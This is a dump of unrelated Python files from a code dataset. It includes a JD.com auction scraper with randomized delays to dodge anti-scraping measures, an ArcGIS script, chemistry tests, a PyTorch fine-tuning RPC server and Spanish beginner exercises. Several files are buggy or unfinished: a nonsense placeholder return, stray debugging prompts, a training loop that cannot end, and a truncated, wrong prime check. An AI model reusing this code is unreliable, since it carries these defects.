Example\n#\n# For names = [\"doc\", \"doc\", \"image\", \"doc(1)\", \"doc\"], the output should be\n# fileNaming(names) = [\"doc\", \"doc(1)\", \"image\", \"doc(1)(1)\", \"doc(2)\"].\n#\n# Input/Output\n#\n# [execution time limit] 4 seconds (py3)\n#\n# [input] array.string names\n#\n# Guaranteed constraints:\n# 5 ≤ names.length ≤ 1000,\n# 1 ≤ names[i].length ≤ 15.\n#\n# [output] array.string\n\ndef fileNaming(names):\n result = []\n\n for i in range(len(names)):\n num = 1\n if names[i] not in result:\n result.append(names[i])\n continue\n\n while names[i] in result:\n stay = names[i] + '(' + str(num) + ')'\n if stay in result:\n while stay in result:\n num += 1\n stay = names[i] + '(' + str(num) + ')'\n result.append(stay)\n break\n result.append(stay)\n break\n\n return result","sub_path":"codesignal/Intro/Land of Logic/File Naming.py","file_name":"File Naming.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"299018489","text":"import csv\nimport re\nimport time\nimport random\nimport requests\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\n\nCOUNT = 0 # 爬取计数\n\n\ndef get_things_links(url, mode1='w'):\n web_data = requests.get(url)\n web_soup = BeautifulSoup(web_data.text, 'lxml')\n cout_line = 0\n with open('网页地址.csv', mode1, newline='') as file_web:\n for links in web_soup.select('.name a'):\n links = 'http:' + links.get('href')\n data_file2 = csv.writer(file_web)\n data_file2.writerow([links])\n cout_line += 1\n return print('Done 完成一页的爬取,等待五分钟后继续,第一页有{}条'.format(cout_line))\n\n\ndef get_things_info(things_url): # 商品详细信息获取\n data_file_line = []\n browser = webdriver.PhantomJS()\n browser.get(things_url)\n time.sleep(1) # 浏览器缓冲\n web_soup = BeautifulSoup(browser.page_source, 'lxml')\n browser.quit()\n\n start_or_not = web_soup.select('#auction1Timer')[0].text\n start_or_not = re.findall(u'([0-9]+)', start_or_not)\n end_or_not = web_soup.select('#auction3Timer')[0].text\n end_or_not = re.findall(u'[0-9]+', end_or_not)\n if start_or_not:\n print('还没开始,还剩{}'.format(start_or_not))\n elif end_or_not:\n print('正在竞拍,还剩{}'.format(end_or_not))\n else:\n tit = web_soup.select('div.name')[0]\n used = tit.text.split(' ')\n title = tit.get('title')\n shiyong = re.findall(u'([\\u4e00-\\u9fa5]+)', used[0])\n waigaun = web_soup.select('span.item_facade_info')[0].text\n baozhuang = web_soup.select('span.pack_facade_info')[0].text\n\n cost = web_soup.select('.cost')[0]\n cost = re.findall(u'\\d+\\.?\\d*', cost.text)\n\n if cost:\n pass\n else:\n cost = ['1', '1', '1']\n try:\n weiguan = cost[0]\n jiage = cost[1]\n fengding = cost[-1]\n except:\n jiage = '出错'\n\n ending = web_soup.select('#auctionStatus2 > div.auction_intro > div.intro_timer > span.color33')[0].text\n ending = ending.split(' ')\n ending_date = ending[0]\n ending_time = ending[-1]\n\n bid_count_ = web_soup.select('#bidCount')[0]\n bid_count = re.findall(u'[0-9]+', bid_count_.text)\n if bid_count:\n pass\n else:\n bid_count = ['0']\n if float(fengding):\n price_off = float('%.3f' % (float(jiage) / float(fengding) * 100))\n else:\n price_off = '出错'\n number = things_url.split('/')\n number = number[-1]\n data_file_line.append(ending_date) # 结束日期\n data_file_line.append(ending_time) # 结束时间\n data_file_line.append(bid_count[0]) # 拍卖次数\n data_file_line.append(title) # 拍卖物品\n data_file_line.append(shiyong[0]) # 使用情况\n data_file_line.append(waigaun) # 商品外观\n data_file_line.append(baozhuang) # 商品包装\n data_file_line.append(weiguan) # 围观数\n data_file_line.append(jiage) # 最终价格\n data_file_line.append(fengding) # 封顶价格\n data_file_line.append(price_off) # 折扣数\n data_file_line.append(number) # 商品编号\n\n global COUNT\n COUNT += 1\n print(data_file_line)\n with open('商品数据.csv', 'a', newline='') as file:\n data_file2 = csv.writer(file)\n data_file2.writerow(data_file_line)\n print(\"成功写入!已经成功爬取{}条信息\".format(COUNT))\n\n\nduobao_url = 'http://dbd.jd.com/auctionList.html?t=1&t=1&sortField=2&limit=40&page=1' # 夺宝岛的网址\n\nwith open('商品数据.csv', 'w', newline='') as file1:\n data_file = csv.writer(file1)\n data_file.writerow(['结束日期', '结束时间', '拍卖次数', '拍卖物品', '使用情况', '商品外观', '商品包装', '围观数', '最终价格', '封顶价格', '折扣', '商品编号'])\n\ncout = 0\nset_cout = int(input('请输入要抓取的页数'))\n\nwhile cout < set_cout:\n get_things_links(url=duobao_url)\n with open('历史网页地址.csv', 'a', newline='') as file3:\n file3.write(open('网页地址.csv', 'r', newline='').read()) # 保存网页地址\n print('成功') # 获取网页的链接\n time.sleep(200)\n print('还剩100秒')\n time.sleep(100)\n print('开始爬网页详细信息')\n with open('网页地址.csv', 'r', newline='') as file2:\n reader2 = csv.reader(file2)\n for url in reader2:\n print('正在爬' + url[0])\n get_things_info(things_url=url[0])\n stop_time = random.uniform(8, 15) # 反爬,随机生产访问间隔时间\n time.sleep(stop_time)\n cout += 1\nprint('搞定!')\n","sub_path":"爬虫练习/京东夺宝岛.py","file_name":"京东夺宝岛.py","file_ext":"py","file_size_in_byte":4802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"341444445","text":"import stk\n\n\ndef test_mmff(amine2):\n mmff = stk.MMFFEnergy()\n assert mmff.energy(amine2) < mmff.energy(amine2, 1)\n\n\ndef test_uff(amine2):\n uff = stk.UFFEnergy()\n assert uff.energy(amine2) < uff.energy(amine2, 1)\n\n\ndef test_cache_use(amine2):\n mmff = stk.MMFFEnergy()\n mmff.energy(amine2)\n # Since use_cache is False the cache should be empty.\n assert not mmff.cache\n\n # To test that the cache is not being used, put a random object\n # into it, and test that it was not returned.\n obj = object()\n mmff.cache[(amine2.key, 1)] = obj\n assert mmff.energy(amine2, 1) is not obj\n\n # Test that the cache is being filled when use_cache is True.\n cached_mmff = stk.MMFFEnergy(use_cache=True)\n assert not cached_mmff.cache\n cached_mmff.energy(amine2)\n assert cached_mmff.cache\n\n # Test that the cache is being used by putting a random object into\n # it and making sure it gets returned.\n cached_mmff.cache[(amine2.key, 1)] = obj\n assert cached_mmff.energy(amine2, 1) is obj\n\n\ndef test_formation(polymer, amine2):\n mmff = stk.MMFFEnergy(use_cache=True)\n\n water = stk.StructUnit.smiles_init('[H]O[H]')\n products = [water]*3\n formation = stk.FormationEnergy(\n energy_calculator=mmff,\n reactants=polymer.building_blocks,\n products=products)\n\n reactant_energy = sum(\n mmff.energy(bb) for bb in polymer.building_blocks\n )\n product_energy = mmff.energy(water)*3 + mmff.energy(polymer)\n formation_energy = product_energy - reactant_energy\n assert formation.energy(polymer) - formation_energy < 1e-4\n","sub_path":"tests/test_energy_calculators.py","file_name":"test_energy_calculators.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"473129556","text":"#!/usr/bin/env python\r\n# encoding: utf-8\r\n\"\"\"\r\nhrOverlap.py\r\n\r\nCreated by Theron Terhune and Brant Faircloth on 2008-02-11.\r\nCopyright (c) 2008 Theron Terhune and Brant Faircloth. All rights reserved.\r\n\r\nComputes home range overlap between individuals. \r\n\r\nRequires: \r\n\r\n1) a folder of individual home ranges (wspace + \"indiv\")\r\n2) a shapefile containing all home ranges (wspace + \"dissolve.shp\")\r\n\r\nwspace = the base folder of both the files above\r\n\r\nwe re adding a field to the output with gp.AddField_management called bird_ref,\r\nthis is because we work on birds, and bird_ref is the id of the individual to \r\nwhich the base is being compared.\r\n\r\n\"\"\"\r\n\r\n# Import system modules\r\nimport sys, string, os, arcgisscripting, pdb\r\n\r\n# Create the Geoprocessor object\r\ngp = arcgisscripting.create()\r\n\r\n# allows you to overwrite files -- 0 is default which prevents you from overwriting files and therefore gives error msg\r\ngp.overwriteoutput = 1\r\n\r\n# Load required toolboxes...\r\ngp.AddToolbox(\"C:/Program Files/ArcGIS/ArcToolbox/Toolboxes/Conversion Tools.tbx\")\r\ngp.AddToolbox(\"C:/Program Files/ArcGIS/ArcToolbox/Toolboxes/Analysis Tools.tbx\")\r\ngp.AddToolbox(\"C:/Program Files/ArcGIS/ArcToolbox/Toolboxes/Data Management Tools.tbx\")\r\ngp.AddToolbox(\"C:/Program Files/ArcGIS/ArcToolbox/Toolboxes/Spatial Statistics Tools.tbx\")\r\n\r\n# define the base workspace\r\nwspace = \"C:\\\\Documents and Settings\\\\bcf\\\\Desktop\\\\maps\\\\breedingHomeRanges\\\\kernel\\\\breeding\\\\dissolved\\\\2001\\\\\"\r\n# define a place for temp files (trash)\r\ntrashSpace = wspace + \"NewTrash\\\\\"\r\n\r\ndef createFolder():\r\n #create 2 new folders for new shapefiles created in the this script\r\n output_location = wspace\r\n output_folder = \"NewTrash\"\r\n output_location2 = trashSpace\r\n output_folder2 = \"NewClips\"\r\n # Process: Create Folder...\r\n gp.CreateFolder_management(output_location, output_folder)\r\n gp.refreshcatalog(output_location)\r\n gp.CreateFolder_management(output_location2, output_folder2)\r\n gp.refreshcatalog(output_location2)\r\n \r\ndef newFeature(): # this function creates a shapefile with all home ranges except for the individual of interest\r\n # create workspace -- this is the folder with the individual MCPs\r\n gp.workspace = wspace + \"indiv\"\r\n # base_shp is the base shapefile with all MCPs merged\r\n base_shp = wspace + \"dissolve.shp\"\r\n # out_ws is variable name indicating where output is to be placed\r\n out_ws = trashSpace\r\n # Get a list of the feature classes (polygons only) in the workspace\r\n fcs = gp.ListFeatureClasses(\"*\",\"polygon\")\r\n # Loop through the list of feature classes\r\n fcs.reset() # to start at the first item in the lisf of poly-feature classes in folder\r\n fc = fcs.next()\r\n while fc:\r\n # Process: Feature Class to Feature Class...\r\n # listfc is variable name splitting feature class names obtained from gp.ListFeatureClasses\r\n listfc = fc.split(\".\")\r\n # newfc creates variable appending the SQl syntax and individual id found in the shapefile attribute table (in this case the column is MCP_ID)\r\n newfc = ((\"Names <> '%s'\") % (listfc[0]))\r\n # FeatureclassToFeatureclass_conversion {where_clause} {field_mapping} {config_keyword} \r\n gp.FeatureClassToFeatureClass_conversion(base_shp, out_ws, fc, newfc)\r\n fc = fcs.next()\r\n\r\ndef newClip():\r\n #pdb.set_trace()\r\n # create workspace --- these are the individuals home range shapefiles\r\n gp.workspace = wspace + \"indiv\"\r\n # create workspace #2 --- these are the combined home range shapefiles created from newFeature (above; i.e. w/o individual for clipping)\r\n workspace2 = trashSpace\r\n out_ws = trashSpace + \"NewClips\\\\\"\r\n # Get a list of the feature classes in the workspace\r\n fcs = gp.ListFeatureClasses(\"*\",\"polygon\")\r\n # Loop through the list of feature classes\r\n fcs.reset() # to start at the first item in the lisf of poly-feature classes in folder\r\n fc = fcs.next()\r\n while fc:\r\n # Process: Feature Class to Feature Class...\r\n listfc = fc.split(\".\")\r\n newfc = (workspace2 + fc) # assigns name to apprapriate shapefile (= shapefile w/all MCPs except individual) \r\n clipname = out_ws + (('Clip_' + '%s' + '.shp') % (listfc[0])) # assigns a new name to the clip feature for each individual\r\n gp.Clip_analysis(newfc, fc, clipname, \"\") \r\n fc = fcs.next()\r\n\r\ndef addField():\r\n # create workspace --- these are the individuals home range shapefiles\r\n gp.workspace = trashSpace + \"NewClips\\\\\"\r\n # Get a list of the feature classes in the workspace\r\n fcs = gp.ListFeatureClasses(\"*\",\"polygon\")\r\n # Loop through the list of feature classes\r\n fcs.reset() # to start at the first item in the lisf of poly-feature classes in folder\r\n fc = fcs.next()\r\n while fc:\r\n listfc = fc.split(\".\")\r\n newlist = listfc[0].split(\"_\")\r\n BirdRef = ((\"'%s'\") % (newlist[1]))\r\n gp.AddField_management(fc, \"Bird_ref\", \"TEXT\", \"\", \"\", \"\", \"\", \"NON_NULLABLE\", \"NON_REQUIRED\", \"\")\r\n gp.CalculateField_management(fc, \"Bird_ref\", BirdRef, \"PYTHON\", \"\")\r\n fc = fcs.next()\r\n\r\ndef mcpMerge():\r\n # create workspace --- these are the individual 'modified' (from above functions) home range\r\n gp.workspace = trashSpace + \"NewClips\\\\\"\r\n outfc = trashSpace + \"NewClips\\\\FinalMcpMerged.shp\"\r\n # Get a list of the feature classes in the workspace\r\n fcs = gp.ListFeatureClasses(\"*\",\"polygon\")\r\n # Loop through the list of feature classes\r\n fcs.reset() # to start at the first item in the lisf of poly-feature classes in folder\r\n fc = fcs.next()\r\n inputs = fc # sets string variable to be insert into Merge tool below\r\n fc = fcs.next()\r\n while fc:\r\n inputs = inputs + \";\" + fc\r\n fc = fcs.next() \r\n gp.Merge_management(inputs, outfc)\r\n\r\ndef calcArea():\r\n # create workspace --- these are the individual 'modified' (from above functions) home range shapefiles\r\n shape = trashSpace + \"NewClips\\\\FinalMcpMerged.shp\"\r\n outshape = wspace + \"FinalMcpMerged.shp\"\r\n gp.CalculateAreas_stats(shape, outshape)\r\n outshape2 = wspace + \"FinalMcpMerged.shp\"\r\n gp.AddField_management(outshape2, \"Acres\", \"DOUBLE\", \"\", \"\", \"\", \"\", \"NON_NULLABLE\", \"NON_REQUIRED\", \"\")\r\n gp.AddField_management(outshape2, \"Hectares\", \"DOUBLE\", \"\", \"\", \"\", \"\", \"NON_NULLABLE\", \"NON_REQUIRED\", \"\")\r\n gp.CalculateField_management(outshape2, \"Acres\", \"[F_AREA]*0.0002471054\", \"VB\", \"\")\r\n gp.CalculateField_management(outshape2, \"Hectares\", \"[F_AREA]*0.0001\", \"VB\", \"\")\r\n\r\ndef deleteFolders():\r\n # delete folders and shapefiles that you created except final shapefile with individual information\r\n byebye = trashSpace\r\n gp.delete_management(byebye)\r\n\r\n\r\ncreateFolder() \r\nnewFeature()\r\nnewClip()\r\naddField()\r\nmcpMerge()\r\ncalcArea()\r\ndeleteFolders()\r\n","sub_path":"homeRange/hrOverlap.py","file_name":"hrOverlap.py","file_ext":"py","file_size_in_byte":6914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"587714283","text":"import argparse\r\nimport os\r\nimport configparser\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom tqdm import tqdm\r\nfrom collections import Counter\r\nfrom misc_functions import *\r\nimport torch\r\nimport torchvision\r\nfrom torch import nn, optim\r\nfrom torchvision import datasets\r\nimport torchvision.transforms as T\r\nfrom torch.utils.data import DataLoader\r\n\r\nfrom torchvision.utils import make_grid\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport zerorpc\r\n\r\n\r\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\n'''\r\nreferenced https://www.kaggle.com/vatsalmavani/pneumonia-classification-using-pre-trained-model/notebook?select=Pneumonia_model.pt \r\nfor the original model weights and preprocessing/training steps\r\n\r\n'''\r\n\r\nclass HelloRPC(object):\r\n def hello(self, name):\r\n return \"Hello, %s\" % name\r\n\r\n def finetune(self, id, model_path, image_path):\r\n print(id)\r\n print(model_path)\r\n print(image_path)\r\n\r\n #fine_tune(args)\r\n return json.dumps({saldalsjdlajdaslkdjasldjasjdasljdal})\r\n return \"Its working\"\r\n\r\n# parser = argparse.ArgumentParser(description='Process arguments')\r\n# parser.add_argument('-n', '--num_freeze', type=int, default=2)\r\n\r\n# args = parser.parse_args()\r\n\r\n# data_dir = './chest_xray'\r\n\r\ndef evaluate_performance(preds, labels):\r\n preds = torch.exp(preds)\r\n top_p,top_class = preds.topk(1, dim=1)\r\n equals = top_class == labels.view(*top_class.shape)\r\n test_acc = torch.mean(equals.type(torch.FloatTensor))\r\n return test_acc\r\n \r\ndef test_model(test_loader, model, eval_dict, purpose_stamp, device):\r\n model.eval()\r\n criterion = nn.CrossEntropyLoss()\r\n test_loss = 0\r\n test_acc = 0\r\n for images,labels in tqdm(test_loader):\r\n\r\n images = images.to(device)\r\n labels = labels.to(device)\r\n\r\n preds = model(images)\r\n loss = criterion(preds,labels)\r\n test_loss += loss.item()\r\n test_acc += evaluate_performance(preds,labels)\r\n\r\n avg_test_loss = test_loss/len(test_loader)\r\n avg_test_acc = test_acc/len(test_loader)\r\n\r\n print(purpose_stamp + \" - Test Loss : {:.6f} Test Acc : {:.6f}\".format(avg_test_loss,avg_test_acc))\r\n\r\n eval_dict[purpose_stamp]['Avg_Accuracy'] = avg_test_acc\r\n eval_dict[purpose_stamp]['Avg_loss'] = avg_test_loss\r\n\r\n return eval_dict\r\n\r\ndef get_arch(model_path, pretrained, test_stamp):\r\n if test_stamp=='pneumonia':\r\n model = torchvision.models.vgg19(pretrained=pretrained)\r\n # add Linear classifier layer\r\n in_features = model.classifier[0].in_features\r\n classifier = nn.Sequential(\r\n nn.Linear(in_features, 4096),\r\n nn.ReLU(inplace=True),\r\n nn.Dropout(0.5),\r\n nn.Linear(4096, 4096),\r\n nn.ReLU(inplace=True),\r\n nn.Dropout(0.5),\r\n nn.Linear(4096, 2),\r\n nn.LogSoftmax(dim=1)\r\n )\r\n model.classifier = classifier\r\n return model\r\n\r\ndef get_model(model_path, device, num_freeze, test_stamp, num_class=2, pretrained=True):\r\n\r\n model = get_arch(model_path, pretrained, test_stamp)\r\n model.load_state_dict(torch.load(model_path), strict=False)\r\n # load_state_dict(torch.load(PATH), strict=False)\r\n model.to(device)\r\n torch.save(model, './model/pneumonia_id/save_new_model.pt')\r\n input('asdf')\r\n layer_lst = []\r\n\r\n # get the number of layers \r\n for name, param in model.named_parameters():\r\n layer_lst.append(name)\r\n\r\n total_num_layers = len(layer_lst)\r\n input(model)\r\n input('need to parse the architecture')\r\n\r\n loop_ctr = 0\r\n freezing_ctr = 0\r\n # freeze the model layer\r\n # https://discuss.pytorch.org/t/how-the-pytorch-freeze-network-in-some-layers-only-the-rest-of-the-training/7088/2\r\n for name, param in model.named_parameters():\r\n # bias and weights included, so each layer will have 2 counts of 'param'\r\n if loop_ctr < total_num_layers-(num_freeze*2):\r\n param.requires_grad = False\r\n else:\r\n param.requires_grad = True\r\n freezing_ctr += 1\r\n loop_ctr += 1\r\n\r\n # input('freezing_ctr ' + str(freezing_ctr))\r\n print('freezing_ctr ' + str(freezing_ctr))\r\n\r\n return model\r\n\r\n# define augmentation\r\ndef apply_transform(mode=None):\r\n# same preprocessing as the original trained model for pneumonia\r\n if mode == 'train_noise':\r\n transform = T.Compose([T.Resize((256,256)),\r\n T.RandomHorizontalFlip(),\r\n T.RandomRotation((-20,+20)),\r\n T.CenterCrop(224),\r\n T.ToTensor(),\r\n T.Normalize([0.485, 0.456, 0.406],\r\n [0.229, 0.224, 0.225])\r\n ])\r\n\r\n elif mode == 'test_noise' or mode == 'val_noise':\r\n transform = T.Compose([T.Resize((256,256)),\r\n T.CenterCrop(224),\r\n T.ToTensor(),\r\n T.Normalize([0.485, 0.456, 0.406],\r\n [0.229, 0.224, 0.225])\r\n ])\r\n \r\n return transform\r\n\r\ndef fine_tune(data_dir='./chest_xray', model_path_OG='./model/pneumonia_id', test_stamp='penumonia', num_freeze=2, epochs=10, acc_threshold=0):\r\n start = time.time()\r\n model_path = os.path.join(model_path_OG, 'pretrained_model.pt')\r\n \r\n # TEST = 'test'\r\n TEST = 'test_noise'\r\n TRAIN = 'train_noise'\r\n # VAL = 'val_noise'\r\n\r\n # Initialize dataset\r\n\r\n trainset = datasets.ImageFolder(os.path.join(data_dir, TRAIN),\r\n transform = apply_transform(TRAIN))\r\n\r\n # valset = datasets.ImageFolder(os.path.join(data_dir,VAL),\r\n # transform = apply_transform(VAL))\r\n\r\n testset = datasets.ImageFolder(os.path.join(data_dir, TEST),\r\n transform = apply_transform(TEST))\r\n\r\n print('Name of Labels:', testset.classes)\r\n print('Index of Labels:', testset.class_to_idx)\r\n\r\n eval_dict = { 'original': {'Avg_Accuracy': 'value_1', 'Avg_loss': 'value_1'},\r\n 'fine-tuned': {'Avg_Accuracy': 'value_2', 'Avg_loss': 'value_1'}}\r\n\r\n train_loader = DataLoader(trainset,\r\n batch_size=8,\r\n shuffle=True)\r\n\r\n test_loader = DataLoader(testset,\r\n batch_size=8)\r\n\r\n # val_loader = DataLoader(valset,\r\n # batch_size=8)\r\n\r\n\r\n print('Training Images:')\r\n dataiter = iter(train_loader)\r\n images,labels = dataiter.next()\r\n print(\"shape of images : {}\".format(images.shape))\r\n print(\"shape of labels : {}\".format(labels.shape))\r\n\r\n # print('\\nValidation Images:')\r\n # dataiter = iter(val_loader)\r\n # images,labels = dataiter.next()\r\n # print(\"shape of images : {}\".format(images.shape))\r\n # print(\"shape of labels : {}\".format(labels.shape))\r\n\r\n print('\\nTest Images:')\r\n dataiter = iter(test_loader)\r\n images,labels = dataiter.next()\r\n print(\"shape of images : {}\".format(images.shape))\r\n print(\"shape of labels : {}\".format(labels.shape))\r\n\r\n # need to find number of unique labels\r\n num_class = len(testset.classes)\r\n print(\"number of classes: {}\".format(str(num_class)))\r\n\r\n # model = TheModelClass(*args, **kwargs)\r\n model = get_model(model_path, device, num_freeze, test_stamp, num_class=num_class, pretrained=True)\r\n # model = torch.load('./model/pneumonia_id/save_new_model.pt')\r\n ''' baseline without tuning '''\r\n # low LR for fine tuning\r\n optimizer = optim.Adam(model.parameters(), lr=0.001)\r\n schedular = optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=0.1, patience=5)\r\n\r\n purpose_stamp = 'original'\r\n eval_dict = test_model(test_loader, model, eval_dict, purpose_stamp, device)\r\n\r\n # input('done original testing')\r\n train_loss_min = np.Inf\r\n criterion = nn.CrossEntropyLoss()\r\n\r\n ''' fine tune model ''' \r\n # for epoch in range(epochs):\r\n epoch = 0 \r\n best_train_acc = 0\r\n # keep training until accuracy threshold AND the specified number of epochs\r\n while best_train_acc < acc_threshold or epoch < epochs or epoch > 20:\r\n epoch += 1\r\n print('training epoch number:', epoch)\r\n\r\n train_loss = 0.0\r\n val_loss = 0.0\r\n train_acc = 0.0\r\n val_acc = 0.0\r\n \r\n model.train()\r\n for images,labels in tqdm(train_loader):\r\n optimizer.zero_grad()\r\n images = images.to(device)\r\n labels = labels.to(device)\r\n\r\n preds = model(images)\r\n loss = criterion(preds, labels)\r\n loss.backward()\r\n optimizer.step()\r\n\r\n train_loss += loss.item()\r\n train_acc += evaluate_performance(preds, labels)\r\n\r\n avg_train_loss = train_loss / len(train_loader)\r\n avg_train_acc = train_acc / len(train_loader)\r\n\r\n schedular.step(avg_train_loss)\r\n\r\n print(\"Epoch : {} \\ntrain_loss : {:.6f}, \\tTrain_acc : {:.6f}\".format(epoch + 1, avg_train_loss, avg_train_acc))\r\n\r\n if avg_train_loss <= train_loss_min:\r\n print('Training loss decreased from ({:.6f} --> {:.6f}).\\nSaving model ...'.format(train_loss_min, avg_train_loss))\r\n torch.save(model.state_dict(), os.path.join(model_path_OG,'finetuned_model.pt'))\r\n train_loss_min = avg_train_loss\r\n best_train_acc = avg_train_acc\r\n\r\n # model.eval()\r\n # with torch.no_grad():\r\n # for images,labels in tqdm(val_loader):\r\n # images = images.to(device)\r\n # labels = labels.to(device)\r\n\r\n # preds = model(images)\r\n # loss = criterion(preds, labels)\r\n # val_loss += loss.item()\r\n # val_acc += evaluate_performance(preds, labels)\r\n\r\n # avg_val_loss = val_loss / len(val_loader)\r\n # avg_val_acc = val_acc / len(val_loader)\r\n\r\n # schedular.step(avg_train_loss)\r\n\r\n # print(\"Epoch : {} \\ntrain_loss : {:.6f}, \\tTrain_acc : {:.6f}, \\nVal_loss : {:.6f}, \\tVal_acc : {:.6f}\".format(epoch + 1,\r\n # avg_train_loss, avg_train_acc,\r\n # avg_val_loss, avg_val_acc))\r\n # if avg_val_loss <= val_loss_min:\r\n # print('Validation loss decreased from ({:.6f} --> {:.6f}).\\nSaving model ...'.format(val_loss_min, avg_val_loss))\r\n # torch.save(model.state_dict(), 'Pneumonia_model.pt')\r\n # val_loss_min = avg_val_loss\r\n\r\n\r\n\r\n model.load_state_dict(torch.load(os.path.join(model_path_OG,'finetuned_model.pt')), strict=False)\r\n # load_state_dict(torch.load(PATH), strict=False)\r\n model.to(device)\r\n purpose_stamp = 'fine-tuned'\r\n eval_dict = test_model(test_loader, model, eval_dict, purpose_stamp, device)\r\n print(eval_dict)\r\n\r\n print(\"Total duration:\")\r\n end = time.time()\r\n print(end - start)\r\n\r\nif __name__ == \"__main__\":\r\n s = zerorpc.Server(HelloRPC())\r\n s.bind(\"tcp://0.0.0.0:4242\")\r\n s.run()\r\n fine_tune(data_dir='./data/pneumonia_id', model_path_OG='./model/pneumonia_id', test_stamp='pneumonia', num_freeze=2, epochs=10, acc_threshold=0.8)","sub_path":"saves/58af6e/train_noise/py/main_script_rpc.py","file_name":"main_script_rpc.py","file_ext":"py","file_size_in_byte":11492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"157580419","text":"def mensaje_negativo(numero):\n \"\"\"\n (float) -> str\n\n Escribe un mensaje para evaluar un numero negativo\n\n >>> mensaje_negativo(-10.0)\n 'El numero es negativo'\n\n >>> mensaje_negativo(898)\n 'El numero es positivo'\n\n :param numero: num el numero a evaluar\n :return: str con el mensaje de la evaluación\n \"\"\"\n if numero < 0:\n return 'El numero es negativo'\n return 'El numero es positivo'\n\ndef compara_edades(edad1, edad2):\n \"\"\"\n (int, int) -> str\n\n Genera un mensaje segun la diferencia de edad:\n la primera o la segunda mas joven o iguales\n\n >>> compara_edades(10, 20)\n 'El primero es mas joven'\n\n >>> compara_edades(89, 56)\n 'El segundo es mas joven'\n\n >>> compara_edades(56, 56)\n 'Tienen la misma edad'\n\n :param edad1: int la edad del primero\n :param edad2: int la edad del segundo\n :return: mensaje asociado a la diferencia de edad\n \"\"\"\n if edad1 > edad2:\n return 'El segundo es mas joven'\n elif edad1 == edad2:\n return 'Tienen la misma edad'\n else:\n return 'El primero es mas joven'\n\n\ndef es_parentesis(caracter):\n \"\"\"\n\n (str of len == 1) -> str\n\n >>> es_parentesis('(')\n 'Es parentesis'\n >>> es_parentesis('x')\n 'No es parentesis'\n >>> es_parentesis('xa')\n Traceback (most recent call last):\n ..\n TypeError: xa no es un parentesis\n\n :param caracter: str el caracter a evaluar\n :return: str el mensaje de la validacion\n \"\"\"\n if len(caracter) != 1:\n raise TypeError(str(caracter) + ' no es un parentesis')\n elif caracter in '()': # caracter == '(' or caracter == ')':\n return 'Es parentesis'\n return 'No es parentesis'\n\n\ndef dividir(dividendo, divisor):\n '''\n\n (num, num) -> num\n\n Divide un numero entre otro\n\n >>> dividir(6, 2)\n 3.0\n >>> dividir(1,0)\n Traceback (most recent call last):\n ..\n ZeroDivisionError: No dividiras por 0\n >>> dividir('hola', 100)\n Traceback (most recent call last):\n ..\n TypeError: hola no es un numero\n\n :param dividendo: num el dividendo a evaluar\n :param divisor: num el divisor a evaluar\n :return: la división entre dividendo y divisor\n '''\n if int != type(dividendo) != float:\n raise TypeError(str(dividendo) + ' no es un numero')\n elif int != type(divisor) != float:\n raise TypeError(str(divisor) + ' no es un numero')\n elif divisor == 0:\n print('al pelo')\n raise ZeroDivisionError('No dividiras por 0')\n return dividendo / divisor\n\ndef par_impar(num):\n \"\"\"\n num -> str\n\n Entra un numero y sale si es par o impar\n\n :param num: numero a ser revisado\n :return: mensaje dejando saber si es par o no\n\n >>> par_impar(6)\n 'Es par'\n >>> par_impar(7)\n 'Es impar'\n >>> par_impar('d')\n Traceback (most recent call last):\n ..\n TypeError: No es valido\n\n \"\"\"\n if str == type(num):\n raise TypeError('No es valido')\n elif num % 2 != 0:\n return 'Es impar'\n else:\n return 'Es par'\n\ndef mitad_doble(num1,num2):\n \"\"\"\n\n Entra un numero y se revisa si el primero es el doble del segundo\n\n Num -> Str\n\n :param num1: Numero a ser operado\n :param num2: Numero a ser revisado\n :return: Mensaje si uno es el doble del otro\n\n >>> mitad_doble(7,14)\n 'Si es el doble de un impar'\n >>> mitad_doble(7,15)\n 'No es el doble de un impar'\n >>> mitad_doble('hola',5)\n Traceback (most recent call last):\n ..\n TypeError: No es valido\n >>> mitad_doble(4,'jl')\n Traceback (most recent call last):\n ..\n TypeError: No es valido\n\n \"\"\"\n if str == type(num1) or str == type(num2):\n raise TypeError('No es valido')\n elif num1 % 2 != 0 and num1*2 == num2:\n return 'Si es el doble de un impar'\n else:\n return 'No es el doble de un impar'\n\ndef cuadrado_primero(num1,num2):\n \"\"\"\n\n Entran dos numeros para verificar si es el cuadrado del primero, si es mayor o menos que la misma operacion\n\n num -> string\n\n :param num1: Primer numero\n :param num2: Segundo numero\n :return: Mensaje se verificacion\n\n >>> cuadrado_primero(2,4)\n 'Segundo cuadrado del primero'\n >>> cuadrado_primero(2,3)\n 'Segundo es menor al cuadrado del primero'\n >>> cuadrado_primero(2,5)\n 'Segundo es mayor al cuadrado del primero'\n >>> cuadrado_primero(-2,4)\n 'Segundo cuadrado del primero'\n >>> cuadrado_primero('q',3)\n Traceback (most recent call last):\n ..\n TypeError: No es valido\n >>> cuadrado_primero(3,'i')\n Traceback (most recent call last):\n ..\n TypeError: No es valido\n\n \"\"\"\n\n if str == type(num1) or str == type(num2):\n raise TypeError('No es valido')\n elif num1**2 == num2:\n return 'Segundo cuadrado del primero'\n elif num1**2 > num2:\n return 'Segundo es menor al cuadrado del primero'\n elif num1**2 < num2:\n return 'Segundo es mayor al cuadrado del primero'\n\ndef es_primo(num):\n \"\"\"\n\n Determina, a partir de un numero dado, si es primo o no\n\n :param num: Numero de entrada\n :return: Es primo o no\n\n >>> es_primo(8)\n 'No es primo'\n >>> es_primo(3)\n 'Es primo'\n >>> es_primo(1)\n Traceback (most recent call last):\n ..\n TypeError: No es valido\n >>> es_primo(9)\n Traceback (most recent call last):\n ..\n TypeError: No es valido\n\n \"\"\"\n\n if num < 2:\n raise TypeError('No es valido')\n elif num >= 9:\n raise TypeError('No es valido')\n elif num == 2:\n return 